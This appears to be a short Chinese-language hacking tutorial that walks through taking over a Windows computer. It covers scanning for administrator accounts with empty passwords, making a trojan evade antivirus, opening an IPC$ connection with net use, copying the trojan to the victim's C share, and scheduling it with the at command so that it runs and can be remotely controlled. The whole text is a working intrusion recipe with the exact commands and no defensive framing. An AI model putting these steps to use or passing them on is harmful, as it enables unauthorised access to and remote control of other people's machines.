1 用扫描软件X-scan等搜寻存在弱口令的主机，如果扫描到一个具有管理员权限且没有设置密码的账户，即可继续下面的步骤；

2 下面有两条路可以走：一是在用户的电脑上运行telnet命令（命令行界面）；二是上传木马（图形界面）；下面以上传木马为例，为了抵抗杀毒软件，需要对木马进行免疫，让杀毒软件无法识别；

3 建立IPCS连接，使用命令：

net use \\192.168.1.122\ipc$ "" /user:administrator

4 接着查看用户电脑开启了什么共享，使用命令：

c:>net view \\192.168.1.122

5 知道了共享目录，上传木马服务端cmd.exe到用户共享文件夹下面，使用命令：

copy cmd.exe \\192.168.1.122\C：

6 在运行木马之前，查看用户电脑当前时间，使用命令：

net time \\192.168.1.122

7 用at命令设置任务计划，让木马在某一时间运行。（需要开启task Scheduler服务），使用命令：

at \\192.168.1.122 22:00 C:\cmd.exe

8 到了22：00后，便可以用客户端连接用户的服务端了；